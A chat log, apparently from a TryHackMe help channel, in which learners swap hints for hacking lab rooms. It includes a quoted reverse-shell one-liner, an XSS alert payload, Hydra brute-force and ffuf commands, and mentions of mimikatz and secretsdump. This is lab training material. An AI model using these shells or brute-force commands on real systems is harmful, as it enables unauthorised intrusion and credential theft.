#room-hints
@trim haven
No, that's illegal
If you get permission to do it from the owner it wouldn't, there are probably websites specifically made for hackers to legally play with that stuff
Tip: ../ --> web traversal
Ah man I need my glasses
rfi is crazy that it apparently rarely happens
RFI was a nightmare for me
I'm finishing off Metasploit soon
hi I'm having trouble with level four of SQLi
in blind sqli
I am querying the database and I don't see a table even tho I am trying every letter of the alphabet
what is that room ?
can you pls link it
in band sqli part
what task is it
task 8 but I think I found answer
hold on a sec
ok I think I found it nevermind
ok. great
hi im doing ohsint CTF and im stuck at the second one
i got the location and i typed that location in wigle net
but the hint says it has something to do with BSSID
so im thinking can i get more info about BSSID from a photo or do i still need to find more about BSSID in wigle net
the location is Hawes
---- ExifTool ----
ExifTool Version Number : 12.42
---- System ----
File Name : WindowsXP.jpg
Directory : .
File Size : 234 kB
File Modification Date/Time : 2022:07:23 09:14:52-04:00
File Access Date/Time : 2022:07:23 09:26:21-04:00
File Inode Change Date/Time : 2022:07:23 09:15:31-04:00
File Permissions : -rwxrw-rw-
---- File ----
File Type : JPEG
File Type Extension : jpg
MIME Type : image/jpeg
Image Width : 1920
Image Height : 1080
Encoding Process : Baseline DCT, Huffman coding
Bits Per Sample : 8
Color Components : 3
Y Cb Cr Sub Sampling : YCbCr4:2:0 (2 2)
---- XMP-x ----
XMP Toolkit : Image::ExifTool 11.27
---- XMP-exif ----
GPS Latitude : +54.2947963000
GPS Longitude : -2.2503684000
---- XMP-tiff ----
Copyright : OWoodflint
---- Composite ----
Image Size : 1920x1080
Megapixels : 2.1
GPS Latitude Ref : North
GPS Longitude Ref : West
GPS Position : +54.2947963000, -2.2503684000
You got the location already?
You should be able to find the location for question 2 once you found the BSSID
how to find BSSID
ohhh thanks
yeh yeh i found the social media account in the first question
thank u for helping me
Gave +1 Rep to @left thunder
Gave +1 Rep to @dusk totem
Hey guys!! Can someone help me with simple Ctf room
@alpine kestrel same point where i was earlier!!! Sql injection
Every time i use CVE it gives out different output
ah still getting weird output from that script???
Yaah
have you tried converting it to python3 with 2to3 yet???
I tried it
But wasn't successful in it
I'm unable to understand why this CVE is giving me this kind of output..
What's the reason behind it?
¯\_(ツ)_/¯
I tried contacting the person who created this room
worked the first time after shadow ran it in python3 after conversion
@fervent vault try this file to see if it works
rather not give you the correct output unless this also fails
I have this.. downloaded from exploit db
Okkieee so this one will work with python3
yuups
@alpine kestrel trying it out will let you know if it give up something..!!!
thnks @alpine kestrel !
@alpine kestrel getting same weird results...
can you show the whole command you ran to run the script???
I really struggle to understand the question
I tried 128 and 512 (Stand for 8x16\8x64) but it's not the answer
||Now I understand I think (it's because the bits are just 0 and 1 so I have just 2 possibility so it's why it's work with power and not multiplication ?) @lucid junco||
Possibly, when I first done it that calculation was the first thing to pop in my head.
Heya, anyone here complete FollioMSDT?
Hmmm. Interesting. I can exec the vuln easy enough. I just can't answer 2 of the questions. What I THINK is the answer isn't being accepted.
@burnt rivet The room looks as if its public in the search.
I'm doing SQL injection room level 4 and I found that the name of the database starts with "sql_"
I'm having a hard time figuring out the name of the full database
I tried entire alphabet
I tried every digit
I don't understand
ok hold on
I was able to get "sqli_four"
ok I got that the database I was looking for was sqli_four
but how do I select something from it?
In room Metasploit: Exploitation, task 2, question 3, "What is running on port 8000?"
I ran msfconsole
use auxiliary/scanner/http/http_version
setg rhosts 10.10.224.228 set LPORT 8000 run.
It tells me the scan is complete but gives no results. What did I miss?
I prefer nmap for service and port scan not metasploit
I am in the Metasploit room trying to learn Metasploit.
Do you mean using nmap within Metasploit?
You using http_version on port 8000, what if it does not have webserver running?
Create new tab of terminal and run nmap against port 8000.
The hint says to use the http_version module.
Ohh
Check if you have set the correct values?
It looks like it.
Try to use show options and see that you misinterpreted one of the parameter .
Yes
Thanks.
Gave +1 Rep to @vernal yew
gone
Hi everyone, i'm newbies. I get something wrong task 6 Virtual Host - Subdomain Enumeration, i'm using the provided script but no sub domains are coming up : ffuf -w /usr/share/wordlists/SecLists/Discovery/DNS/namelist.txt -H "Host: FUZZ.acmeitsupport.thm" -u http://10.10.82.169. I'm running the exact same command as everyone else but getting zero results with and without the -fs flag. Can anyone help me please...
You sure that IP is from the target machine and not the attackbox?
Do you see a box similar to that?
It was displayed with Title: acmeitsupportv10 and IP Address: 10.10.200.185 in Subdomain Enumeration room
For task 7 in Network Services, how do I view flag.txt?
I did everything in the instructions but I'm confused.
I ran the "msfvenom" script in the telnet session, so I assume I do.
I get it now
Hi there, I've just finished the Pickle Rick challenge (at last), and I was wondering some extra-stuff.
I'd like to dig a bit more about two things :
- The 1st is ||on the login page : I found that there was a way for cross-scripting in the username field as I succeed to pop an alert with this entry "/><script>alert('pop')</script> but after that, I was stuck to exploit this flaw, like while trying to get a reverse-shell for example. Was-it possible ?||
- The 2nd is kinda of the same type : || once the command line reached, I tried again to get a reverse-shell, with a simple /bin/sh -i >& /dev/tcp/10.0.0.1/1234 0>&1 and some similar command-line, but it never worked...did I tried for nothing ?||
Thanks in advance for your time and patience
Oh, I got it for the 1st one, and for the 2nd, I understand there's many (many many, soooo many) things I'm still ignoring indeed. Thanks
Gave +1 Rep to @burnt rivet
Hi is anyone gonna be on here in another hour?
I need help with sql injection room
pity you didnt ask directly, i am interested where you got stuck
hi i have a little problem with wigle net
everytime i search, i always got search failed error
im doing ohsint ctf
i got bssid and now im using wigle net to find the location
Did you create an account on wigle?
yep i did
View > Basic Search?
yes that one
And it didn't work?
Did you hit query ?
yes i did
Can you DM me a screenshot?
ok
Hi All,
I'm trying to solve simple ctf room
but getting an error
yes the same one
tried with both python 2 and 3, but same error
python3 cms.py
Traceback (most recent call last):
File "/home/soni/cms.py", line 11, in <module>
import requests
ModuleNotFoundError: No module named 'requests'
┌─[✗]─[soni@parrot-pc]─[~]
└──╼ $python2 cms.py
Traceback (most recent call last):
File "cms.py", line 11, in <module>
import requests
ImportError: No module named requests
already installed
You haven't installed all the dependencies. Your best bet is to create a python virtual environment (venv) and install all the dependencies and needed scripts in the venv and not the system python.
but receiving an error
$pip install python-requests
ERROR: Could not find a version that satisfies the requirement python-requests
ERROR: No matching distribution found for python-requests
I know that seems complicated, but it makes your life easier when you have python dependencies that conflict.
It's just pip install requests
ip install requests
Requirement already satisfied: requests in /usr/lib/python3/dist-packages (2.25.1)
try python3 -m pip install requests perhaps?
even this didn't work
Are you using a venv?
no
what was exact output?
also what is your base operating system, it seems like you are installing requests on different version of python
than what you are afterward using to launch the program
not really, if you had it it would work
try to take a look at this
Nope, python3 -m pip install requests will use Python3 and it will use the same pip as what's used when running python3 cms.py
i agree, but he didn't show the output of that command, if it ran correctly that python3 -m pip install requests , or if there was some additional problem
Bit stuck here. Currently in a meterpreter session, I've uploaded a meterpreter payload to the machine for privesc. The privesc path is unquoted service path, so I'm trying to output the content of the payload into the service executable, however the usual trick of "cat payload > service.exe" is outputting to console.
Nvm brainfart - all sorted
Network Services - Task 3, Question 2: What ports is SMB running on?
Supposed to use enum4linux on the IP address.
I tried using "enum4linux -a IP" but sifting through it all, I couldn't find exactly what I was looking for. It might be in there, but I can't recognize it.
did you not use nmap first???
@alpine kestrel I did, got the 3 IP addresses to look for
So I'm still using Nmap for question 2 then?
@burnt rivet Mostly guessing, but I'd imagine SMB programs would have their destination written in their TCP protocol
3 open ports
my bad
sure, but I don't want to brute force all 3 into the answer box
Is there a specific nmap tag that brings up SMB information?
Got it!
Ran the -sV scan for service info and saw the Samba next to 139 and 445
Thanks
Hi guys
hello
i'm new and I'm stuck on Nmap lesson. I can't figure out what is my target on task 14. Could you help me please ?
start the machine? if you haven't, you will see IP address and that will be your target
I started it but I didn't see IP target... I saw my own IP...
can you share the screenshot?
ok just a minute please
!docs verify
verify first to send ss
click on this green button to start the machine
start the machine from task 1
the right side of your screen is attackbox
Thanks
Happy Hacking!
Thanks
+rep @cold eagle
Gave +1 Rep to @cold eagle
Hi guys
I know how to scan my own interfaces with wireshark but I don't know how to scan a target... Can you help me please ?
It's for the Nmap lesson
Mh, what you mean with scan with wireshark?
You can only capture traffic with wireshark
Sorry I just understand what the question is... The problem : my english understanding... 🤦
Okay, just checked what question you are talking about, I guess this one, right ?
yes it is
Since you are on the attackbox, just open wireshark, start capturing on eth0 with it.
Then run the nmap scan against the target machine
If you are unfamiliar with wireshark, you might want to check out the wireshark rooms
I will I know how it works but I'm not really good at understanding the whole results
is there a way to save the results of wireshark for after the wireshark lesson ?
You can yes, but you have to transfer the generated pcap file to your own machine, or somewhere else, since the attackbox will be reset once you shut it down
How could i send it to my computer ??
You could use scp with the credentials that can be found at the bottom of the attackbox, when pressing the info button.
Thanks
Or since you are subscriber, your attackbox has internet access, upload the file to a file host
Hello everyone, im trying to do the room/wiresharkthebasics and got stuck on "Go to packet 12 and read the comments. What is the answer?"
I have managed to get to the picture, but now I have absolutely no idea what to do, wondering if anyone can give me a hint on how to proceed?
Tried zooming out?
yeah, can't see anything and looks like the word they are looking for is pretty long as well
start by checking your ip and port and make sure you are trying to send the shell to the right ip
Room is WindowsPrivilegeEscalation from Jr.Pentester Path
I am trying to dump hashes from the registry hives but always get the error "NoneType" at the sam.hive
Any tips ?
need h1nt
I'm having issues with figuring out the right database name
I think it starts with "sqli_" but I don't know what comes after that
like I've been trying to figure it out for a while
could someone help me out?
if no one is on could someone please DM me when you see this?
I have tried every key to find something after "sqli_"
Has anyone completed Attacktive Directory?
I'm having an issue running the secretsdump.py
it gives an error about no module named 'impacket.examples.utils'
what does pip install impacket show you?
if you're on the attackbox then it should work, make sure you're using the /opt impacket and python3.9 I think
I can dm you a screenshot of the command im using just to not give away any spoilers
nah, spoilers aren't a thing here,
oh okay
they're only for recently released ctf challenges (3 days to a week)
does python3.9 do anything or is it the same error
that works!
yeh, dependency hell strikes again
haha thanks!
yes, it's up
no luck
for the Basic Pentesting room, should I be using Hydra to attack smb or ssh? when I do smb it says invalid user and ssh is running for a little while
for ssh yes
do u have the username already?
thats what I thought, but its been running using rockyou didnt know if I was doing something wrong
can u show the command?
yeah jay and kay. got it from enum4linux
show your hydra command
hydra -l jan -P /usr/share/wordlists/rockyou.txt 10.10.195.47 -t 4 ssh
just still running, from the notes on the webserver apparently jan has a weak password so I figured it wouldve found it quickly
yes the password is just a name
||hydra -l jan -P /usr/share/wordlists/rockyou.txt ssh://$IP||
can u try this?
yes
maybe I need to restart the box?
yea try that first
What's your target IP?
and run the command again
let me try don't terminate yet
ok ill wait
I knew I was doing it right and something seemed off lol
since I just finished the Hydra room to refresh my memory
the password that i know works fine
it's just hydra that take long
try to use Seclists password instead
it's smaller than rockyou
||/usr/share/wordlists/SecLists/Passwords/Common-Credentials/best1050.txt||
and this file specifically if u want it faster
ah I dont have that one
found it
apt -y install seclists
I asked you in another channel, please don't spam, it won't get you any help faster.
finally. seclists worked. Thank you! @lucid junco @languid isle
Gave +1 Rep to @lucid junco
+rep @languid isle
Gave +1 Rep to @languid isle
omg this box is the slowest. yes the same one. Logging in ssh I get about 15 seconds before the terminal locks up
so for the priv esc, I see that vim has SUID, am I on the right path?
basic pentesting
ah I already closed it. It's what linenum reported, I thought it might be useful
I probably did, I tried some one liners to get a shell and it didnt work
yes I gave up on that
damn, I was in the middle of a reverse shell too
oh 🤷
yeah had to restart
nah moved onto rootme.
i've got foothold but both home dir are empty, y no user flag
or user text
its asking for one
nah I said I moved onto rootme lol
thats step 4 though.
i checked both users
test
rootme
both are empty
oh i was overthinking it
i found it in ||var/www||
I got groot
I feel like ive done a very similar box before so it was ez
sounds familiar lol so maybe
oh yeah
I think the only difference was there was a cronjob that ran as root every 2 minutes a user could modify. but everything else was the same
Hi, I have troubles with Network Services 2, task 3: i'm being asked to type the password, but I thought it were sufficient to have the id_rsa
yeah it doesnt like stuff that isnt a particular permission
Was wondering if anyone could help with this I'm in the Vulnerability Capstone room. I'm on the last part of the challenge. I found the CVE and I'm tryin to get a reverse shell. I downloaded the CVE and I ran this command ---> python3 47138.py http://10.10.75.154
It throws this back: File "/home/testbox/Downloads/47138.py", line 34
print r.text[0:dup]
Try running it with python2
k
thanks
Gave +1 Rep to @dusk totem
that seemed to work I got a cmd:
but when I type ls or whoami it kicks me out ?
ok I'll give it a shot!
yeah if you don't mind
jaxafed 
It seems like the exploit sends the request through burp, if it is not running you can change the r = requests.get(burp0_url, proxies=proxy) to r = requests.get(burp0_url)
@vague pine you're the only person I've seen who's completed insane rooms and still hanged around
I try what you suggested and this is what I got ?
Also don't forget the change the url on line 14 to your target.
yeah that what the scripted is set at
OK
ok thanks
Gave +1 Rep to @dusk totem
here's the scripted
lol ok so change the url to the box I'm attacking 🤦 and how do I stop it form going to burp? I don't even have burp running.
ok
ok should I just delete that part if I'm not use burp for this attack?
ok or change it my my ip
ok I think I got this.. 🤪 thanks!
Gave +1 Rep to @vague pine
Something is wrong with the Blue room...........
Unless i'm using the wrong syntax in Nmap..............
Could someone tell me if this is correct plz;
└──╼ $sudo nmap -sV -vv --script vuln -p 1-1000 -Pn 10.10.225.117
!dark
Are you trying to enum the top 1000 ports?
I am, yes.
This is right too though isn't it;
└──╼ $sudo nmap -sV -sC --script=default -p 1-1000 10.10.225.117
The space between -p and ports does not make a difference and -sC is the same as --script=default
Oh, I see....... I did think the room was broken though.
Thanks............
Gave +1 Rep to @dusk totem
I'm not sure, The machine is down now, So i'll work with another.
I mean......... I let it time out.......
So..........
Blue isn't broken.
It's never broken.
!dark
!dark
!dark
Blue room is never broken
is that true !8ball?
0.0
-8ball is that true?
yo what lol
No
Hi everyone, I'm new on the TryHackMe, after trying the first task intro to offensive security and I'm not getting it.. can someone explain the error
well if you could verify your discord with tryhackme to send a picture it would be easier to see what you are doing wrong to help you....
!docs verify
I think I've verified??
not yet as i can see
Hello, can I have some help on JVM Reverse Engineering (https://tryhackme.com/room/jvmreverseengineering) ?
Task 4 - Basic String Obfuscation
I already got the password from the decompiler which is 17-character long. But my answer is wrong. Any clue?
do you have this cuz it's incorrect? aRa2lPT6A6gIqm4RE
yeh, a little xor magic is needed
ok thanks for the tips
what are you using to see the decompiled code?
just online decompiler
yeh, don't do that, would recommend jadx/jadx-gui or some other java decompiler
thank you ❤️
Gave +1 Rep to @cedar anvil
Scratch that.. restarted the machine it works now
Hi guys, I'm doing Network Services lesson
For Task 3 I have to answer to this question : What ports is SMB running on?
Can you give me a hint please? 445/tcp doesn't work
ports
not port
ports
it probably doesn't want the protocol after the slash, so what did your scan show you?
Is netbios part of SMB ?
port 22 ssh
port 139 netbios-ssn
port 445 microsoft-ds
ok so, which of those have smb or samba noted with them?
that should be your answer
also go in order of what showed on the scan
I looked on https://en.wikipedia.org/wiki/List_of_TCP_and_UDP_port_numbers And only 445 was listed... But I checked and got the answer...
your scan should show you which ports SMB is using for that machine. Defaults are often the case but not always, which is why recon is important because services are configurable for ports right? Someone thinks they're being clever and using a non-default port to obfuscate
please put it in spoilers
I didn't put the right option 🤦
I know I'm dumb but... Can you give me a hint about " What share sticks out as something we might want to investigate?"
Don't be hard on yourself, just gotta keep at it until things click
alright so what did it have you just do?
I just did enum4linux
Also, THIS is the exact reason you have a lab, so that you make mistakes they stick in your brain better. You remember mistakes that cost you time an effort. You learn more when things go wrong
To have informations about the computer
Good, what was the output
?
more specifically the output it's referring to as what could be interesting
I have to separate it
because that output might be a-lot
||
`WARNING: polenum.py is not in your path. Check that package is installed and your PATH is sane.
Starting enum4linux v0.8.9 ( http://labs.portcullis.co.uk/application/enum4linux/ ) on Thu Jul 28 17:09:12 2022
==========================
| Target Information |
Target ........... 10.10.164.146
RID Range ........ 500-550,1000-1050
Username ......... ''
Password ......... ''
Known Usernames .. administrator, guest, krbtgt, domain admins, root, bin, none
`||
gimme a sec
||`
| Enumerating Workgroup/Domain on 10.10.164.146 |
[+] Got domain/workgroup name: WORKGROUP
=============================================
| Nbtstat Information for 10.10.164.146 |
Looking up status of 10.10.164.146
POLOSMB <00> - B <ACTIVE> Workstation Service
POLOSMB <03> - B <ACTIVE> Messenger Service
POLOSMB <20> - B <ACTIVE> File Server Service
..MSBROWSE. <01> - <GROUP> B <ACTIVE> Master Browser
WORKGROUP <00> - <GROUP> B <ACTIVE> Domain/Workgroup Name
WORKGROUP <1d> - B <ACTIVE> Master Browser
WORKGROUP <1e> - <GROUP> B <ACTIVE> Browser Service Elections
MAC Address = 00-00-00-00-00-00
======================================
| Session Check on 10.10.164.146 |
[+] Server 10.10.164.146 allows sessions using username '', password ''
============================================
| Getting domain SID for 10.10.164.146 |
Domain Name: WORKGROUP
Domain Sid: (NULL SID)
[+] Can't determine if host is part of domain or part of a workgroup
=======================================
| OS information on 10.10.164.146 |
[+] Got OS info for 10.10.164.146 from smbclient:
[+] Got OS info for 10.10.164.146 from srvinfo:
POLOSMB Wk Sv PrQ Unx NT SNT polosmb server (Samba, Ubuntu)
platform_id : 500
os version : 6.1
server type : 0x809a03
`||
||`==============================
| Users on 10.10.164.146 |
==========================================
| Share Enumeration on 10.10.164.146 |
WARNING: The "syslog" option is deprecated
Sharename Type Comment
--------- ---- -------
netlogon Disk Network Logon Service
profiles Disk Users profiles
print$ Disk Printer Drivers
IPC$ IPC IPC Service (polosmb server (Samba, Ubuntu))
Reconnecting with SMB1 for workgroup listing.
Server Comment
--------- -------
Workgroup Master
--------- -------
WORKGROUP POLOSMB
[+] Attempting to map shares on 10.10.164.146
//10.10.164.146/netlogon [E] Can't understand response:
WARNING: The "syslog" option is deprecated
tree connect failed: NT_STATUS_BAD_NETWORK_NAME
//10.10.164.146/profiles Mapping: OK, Listing: OK
//10.10.164.146/print$ Mapping: DENIED, Listing: N/A
//10.10.164.146/IPC$ [E] Can't understand response:
WARNING: The "syslog" option is deprecated
NT_STATUS_OBJECT_NAME_NOT_FOUND listing *
=====================================================
| Password Policy Information for 10.10.164.146 |
[E] Dependent program "polenum.py" not present. Skipping this check. Download polenum from http://labs.portcullis.co.uk/application/polenum/
===============================
| Groups on 10.10.164.146 |
[+] Getting builtin groups:
[+] Getting builtin group memberships:
[+] Getting local groups:
[+] Getting local group memberships:
[+] Getting domain groups:
[+] Getting domain group memberships:
`||
Erm, my bad, next time I'll have you DM this since it's a lot of info. The goal to keep things in hints is so others can search prior convos and help themselves
all good though
there's a lot of info here
The mindset you need to have is that you're investigating
You're not looking up an answer, the question wants you to ask what may be of interest
and there may be a few things
I found it
ya? good deal
I didn't understand that tryhackme wanted to have the sharename
dunno if I agreed with their answer here when I looked at what I did, I would have said ||netlogon||
I thought it was a general name inside the share enumeration
It might be but all the same it could still be interesting
But I think you got the idea, I mean it was a curious thing to consider
I don't know... You wish to have information on the computer... You will find more information about the user and not about the network connection, right?
Depends. Users are an easy attack vector but they aren't the only one. You still have lots and lots of vulnerabilities that can be leveraged
and you HAVE to understand those too
That's the hardest path
Not as hard as you think
I hope so
Google makes it easier. Recon is important because it can show us a weakness, and google can help you find an exploit someone has already proven to work, written a script for, and then all you do is execute it and you're in
This room's purpose is to explain common services you'll see so you know what is and isn't relevant
besides... most of these rooms are going to have you using exploits and such to get flags. They can't all be OSINT and brute forcing passwords
right
I promise if you stick with it, it'll eventually start clicking in the place
it just takes a while and a lot of exposure
thanks
you're welcome
You have to crack the hashes by hashing a large number of different inputs (often rockyou, these are the possible passwords), potentially adding the salt if there is one and comparing it to the target hash. Once it matches, you know what the password was. Tools like Hashcat and John the Ripper are normally used for this.
but the salts are unique to each user, right? then how do those tools add the right salt?
sorry, what is a hash dump?
you mean its a part of hash and hashcat removes it?
say someone hacks a website... then they find the database with all the hashed password.... when they send that out on the internet it tends to also have the salts in the database
no, it cant remove I think as the salt is a character added to the password which results in a different hash
this is called a dumping of the database
here hello world is the salt?
$2a$06$7yoU3Ng8dHTXphAg913cyO6Bjs3K5lBnwq5FJyA6d01pMSrddr1ZG
in this hash, is "06" the salt?
yeah funny
man sslpasswd
then whats the point of adding a salt here if it can be easily removed by just looking
Lassi told you exactly what you wanted to know, twice. Read the docs, ask again if you have trouble getting what the docs are telling you.
so the salts are useless against brute force attacks, is that true?
got itttt
thank you very much
I appreciate it
Hi...into https://tryhackme.com/room/attacktivedirectory# I need to enumerate the subnet where is attached the Attackbox VM in order to start getting information about AD to attack?
John can be very particular about the formats it needs data in to be able to work with it, for this reason- in order to crack /etc/shadow passwords, you must combine it with the /etc/passwd file in order for John to understand the data it's being given.
I didnt get why I should combine them, can anyone explain pls?
why should I combine them for John to understand it?
you don't explicitly need to join them but it's neater for john to understand this way,
it associates hashes with usernames and such, but I've almost never used unshadow honestly
alright
still didnt get it, when I unshadowed, it just added the root line of passwd at the end of the line in shadow. How is it gonna help John?
it's neater, it shows cracked passwords next to users, not just random hashed values
aa now I get it. Thank you very much
anyone know , why john isnt working?
do john --show hash to see if it's already cracked
nothing
0 password hashes cracked, 0 left
Just cat the hash file, you will see what is wrong.
?
its here , just above john command
Just run "cat hash" and share the screenshot please.
done thnx
anybody here?
ok my b
just wondering if i was yelling into the void
anyway
i had a question about one of the rooms, particularly task 6 on windows fundamentals
i cant figure out the answer to the first or last question, those being "What is the name of the other user account?" and "What is the account status?"
nvmind
i got it
while running ssh2john, I'm getting the below error
Traceback (most recent call last):
File "/usr/share/john/ssh2john.py", line 193, in <module>
read_private_key(filename)
File "/usr/share/john/ssh2john.py", line 103, in read_private_key
data = base64.decodestring(data)
AttributeError: module 'base64' has no attribute 'decodestring'
Are you using python3? If yes then try with python2
Hey Guys, for the Basic Malware RE room, is any of the files harmful for my laptop, or is it safe to download them
They are not actual malware. It is safe to download and execute.
Thanks!!
maybe not completely appropriate to ask here
if i want to maximize score, how can i choose the rooms (only for 24 hours)
i want to do maximum points, is there a way? because i see that some rooms dont add score at all
if someone would be so kind to tell
Some rooms don't give points at all, so it's best to avoid walkthrough rooms.
Some rooms have questions that have +** and they have bonus points.
Are you trying to get to 0xD, or are you after the monthly hacker badge?
monthly thingie
Hello!
Some who has an idea about the second artist on "Wireshark: The Basics" room?
I'm really stuck: I've tried to search for string like || artist=2 || and also || artist || but cannot find anything related to the second one
#993868677600514130 Someone is stuck on the same question right now
I'm racking my head on Overpass1!!!)
For a very long time.
I know where to look, but I don't know how to apply this vulnerability.
I reread the OWASP top 10 and once again redid all the tasks from the OWASP Top 10 room.
But I still didn't understand what to do with the data received from:
||login.js
} else { Cookies.set("SessionToken",status Or Cookie) window.location = "/admin"
Do I need to create a token myself?
Find admin cookies (but there are none)?
Add to Burp:
Cookie:sessid="SessionToken"?||
I don't want to go to the walkthrough, the level is easy for the machine, I want to reach the solution myself.
Please give one more little push to the solution.
@burnt rivet I can write in DS?
(so as not to covering up half of the text here)))
In **Authentication Bypass room**
Encode the following value using base64 {"id":1,"admin":true}
when I do
echo '{“id”:1,”admin”:true}' | base64
e+KAnGlk4oCdOjEs4oCdYWRtaW7igJ06dHJ1ZX0K
Whereas the accepted answer is
eyJpZCI6MSwiYWRtaW4iOnRydWV9
What am I missing ?
What do you mean by fancy quotes
$echo '{“id”:1,”admin”:true}' | base64
e+KAnGlk4oCdOjEs4oCdYWRtaW7igJ06dHJ1ZX0K
$echo '{id:1,admin:true}' | base64
e2lkOjEsYWRtaW46dHJ1ZX0K
$echo "{id:1,admin:true}" | base64
e2lkOjEsYWRtaW46dHJ1ZX0K
when I decoded
$ base64 -d <<< "eyJpZCI6MSwiYWRtaW4iOnRydWV9"
{"id":1,"admin":true}
Straight versus curly quotation mark
Very common problem when you write the script in anything that isn't a terminal
must use more copy paste
Hi, me again, still on the telnet room
I did everything good (or not visibly), and it doesn't seems to work
oh
i'll try that
thank you @white salmon
Gave +1 Rep to @dusk totem
it works !!
I am doing Lateral Movement and Pivoting, Task 5.
I am doing Pass-the-ticket method, and I injected t1_toby.beck3 ticket.
Then I went to \Users and opened t1_toby.beck directory and I was able to get to his Desktop and to see Flag.exe file which contains the flag. But when I opened it, it says "Sorry! You are still missing something. No flag for you yet. (1)"
I know that I injected t1_toby.beck3 instead of t1_toby.beck ticket, but when I exported tickets using mimikatz, I didn't see ticket for t1_toby.beck ticket, only t1_toby.beck3 ticket
+Rep @thorn stone
Gave +1 Rep to @thorn stone
ty : O
hi all, i'm doing the sqli room but when they asked me for the flag, i cldn't really see where it is even though i've solved the qns
which room to be exact? can u link it?

Hi Everyone
I'm doing the "ninja" room, but cant find the "bny0" file. I already know its the answer to one of the questions, but I'd still like to understand what I'm missing when trying to find it. I'm using the built in "find": find / -type f -name "bny0"
instead of a -name, try -iname (to make it case insensitive), no joy there
drop the -type f in case it's a directory. Still no joy
try follow symbolic links (-L before /), sits there spinning its wheels, pretty sure I got it in an infinite loop.
swap the 0 to a o.
I've even taken a look at others walkthroughs, they just guessed (same as I did) as you can exclude the other files.
Did anyone manage to find it?
can you share the room ip?
Its this room, i just terminated though
https://tryhackme.com/room/ninjaskills
I'll spin it back up now
ssh user and password are in the description
10.10.150.188
ok, that's really weird
going through other walkthroughs online (when I got stuck), i'm wondering if it's on purpose or not
where is the file?
no idea, i can find anyone else online who found it
I've taken a look at the room-bugs channel, and it looks like it's deliberate (or at least was in 2020)
thanks anyways
Does this file have extension?
nope
hello
On Linux PrivEsc, task 6 is asking "Consider how you might use this program with sudo to gain root privileges without a shell escape sequence." I have no idea. I also can't seem to view the options of the program. When I try running it with --help I get this: "bad user name ${APACHE_RUN_USER}"
hey so im on jr pen tester walking an application, ive tried reading the forum posts but it doesnt seem like anyone was having my same problem but I cannot find the answer to the HTML comment in question 1. I found q2 but from what I see there is only one link the comment section and that took me to a thm page but didnt go anyway meaningful.
Solved it meanwhile ?
No i found the last flag so i have q2 and q4 i believe but i turned off my pc to go to bed. Was having a hard time with the other 2
Okay, well you have to look for a comment, it's not a link or something, the comment is just giving you a path you have to try to visit
hi
hi
I could use a hint for "what is the user's shell set as?" [Severity 1 - Command Injection Practical] from Injection4. I have tried a few different things but I can't seem to get to the answer.
Owasp top10?
Do you have the reverse shell?
Yes, OWASP top 10 room
You got the reverse shell?
this one doesn't require much more than navigating to the URL to execute the evilshell.php script
I did research one liners that could accomplish that but was not successful in this room
What's your target IP?
swisskyrepo for example... and it's 10.10.99.106 as assigned
what type of one liner would you recommend in this scenario? @lucid junco
+rep @lucid junco
Gave +1 Rep to @lucid junco
Remember and start nc first.
Anymore bumps, ping/ask in here.
Yes, I got the listener going and will definitely reach out again if I can't get it. Thanks again!
nc quits after the connection is established leaving me without a shell... I'll triple and quadruple check for typos on the command right now
got it
the shell that is
in all the "piping" inputs (< >) from the /bin/sh I had missed a space
got the answer @lucid junco. Thanks for the super helpful hint!
Gave +1 Rep to @lucid junco
Did you manage to complete that task?
I sure did... I did look at the answer straight in the eyes earlier and missed it on the browser, but going through the shell made it all the more obvious
It can be done there, but I found the information on the reverse shell so much easier.
im doing simple-ctf and im stuck at "What's the CVE you're using against the application?" ... i scan and i found that ssh uses 7.2p2 and i google it but the only thing that i found the most is user enumeration but none of the CVE about user enumeration is a correct answer ... it would be helpful if someone gave a help ... thanks
exploit is not against SSH. is against CMS Made Simple 2.2.8. now you need find that CVE on cve.mitre.org. you need research. and how to do it. that i can't tell you since you have to learn
exploit-db is a good source to get exploit code
damn i have been doing wrong the whole time
anyways thank u for helping me
np. let us know if you get it
yep
hi all, did you guys end up creating a meterpreter session for Task 29 of the OWASP10 room?
getting at the actual vuln but the reverse shell I tried is not working for some reason... that's kind of one my weak points right now
I'd be happy to continue this over DM if you prefer
Gave +1 Rep to @fallow sedge
I was just curious if someone ended up using that route as opposed to just a plain reverse shell
yeah... struggling with the mechanics of piping to gain control of the executed shell. The one I chose does not seem to be working so I will go ahead and try to find another one...
well, I got it... moving on
every time i try to answer this question in gobuster room i can get nothing
Which room are you in?
Are you in the C shell?
Have you exploited Blue yet?
yes
So you have a meterpreter shell?
yes
Just type shell
more filename.txt
why do we use the command more? just for knowledge
thanks
hi
I need help on the Burp Suite: Repeater room
this is for the challenge
I tried changing HTTP to FTP, changing HTTP version, and changing product number, including using decimals
its not working
can someone help me with this?
thanks
just to see if I could get the 500 internal server error
hold on a second I am about to Lyft home and then I really want to chat further on this. You'll still be here for a while right?
yes
I checked the question hint
hold on a second
solved
thanks
hey there fellow ethical hackers! I'm hoping someone can help me out here. my answer for PrintNightmare v1.6 Attacked, Task 6, last question is not working. I've tried both ways with the time stamp, using - or : as the answer key shows : and the question shows -. I'm 100% positive I have the right DLL with the right path and time stamp.. it's just not working.
lol nvm
i followed that
hmmmm
so what can i do to run vhost on ip
aha i didnt understand that till now
thx alot
Hello, any nudge on inferno machine please ?
bruteforcing is the way
Thanks
I could bypass the login form but when i try to use the codiad rce exploit it doesn't execute because of http basic authentication, any tips on how to circumvent this ?
Inferno machine
?
sorry not done that room so dunno how to help
Hello
VulnUniversity. Can't seem to figure out what im supposed to do with the hint for the final challenge. Wasn't sure if it was a continuation of something like using msf or making a custom reverse shell entry, or killing some service running to protect login attempts.
"THE" SUID file? no... I don't think so. I did the find from the previous hint to show that the file in the second hint had the S bit
Found several
hmm
i figured it was literally the file from the hint, but i haven't figured out what to do with that information
yeah, I try to not do that because I don't wanna accidentally click on a guide. I'll try that in a few. I'll keep looking at this specifically
thank you
derp
lol
when you try so hard you forget simple things exist
thanks
got it
i was doing simple-ctf and i was stuck cuz i was only looking forward to exploit ssh but now i got it cuz somebody helped me what to do in this chat but the thing i dont get is how did he know and how did he do to get cms model
pls can somebody share me how to detect cms model
i scan with nmap but all i got was ftp, http, and ssh
no sign of cms
I am solving musttacio. I have found admin panel but unable to proceed further. A nudge would be appreciated
Look at the bottom of the website.
Did you use gobuster?
I used dirsearch on that port but only found two directors with code 403 @lucid junco .
Tried enumerating further but no success
Is it coz of the wordless?
Wordlists*
Which wordlist did you use?
Try common.txt in the Web-Content of secLists.
Okk thanks will try
Search for php & txt if you know how
Sure thanks!
Gave +1 Rep to @lucid junco
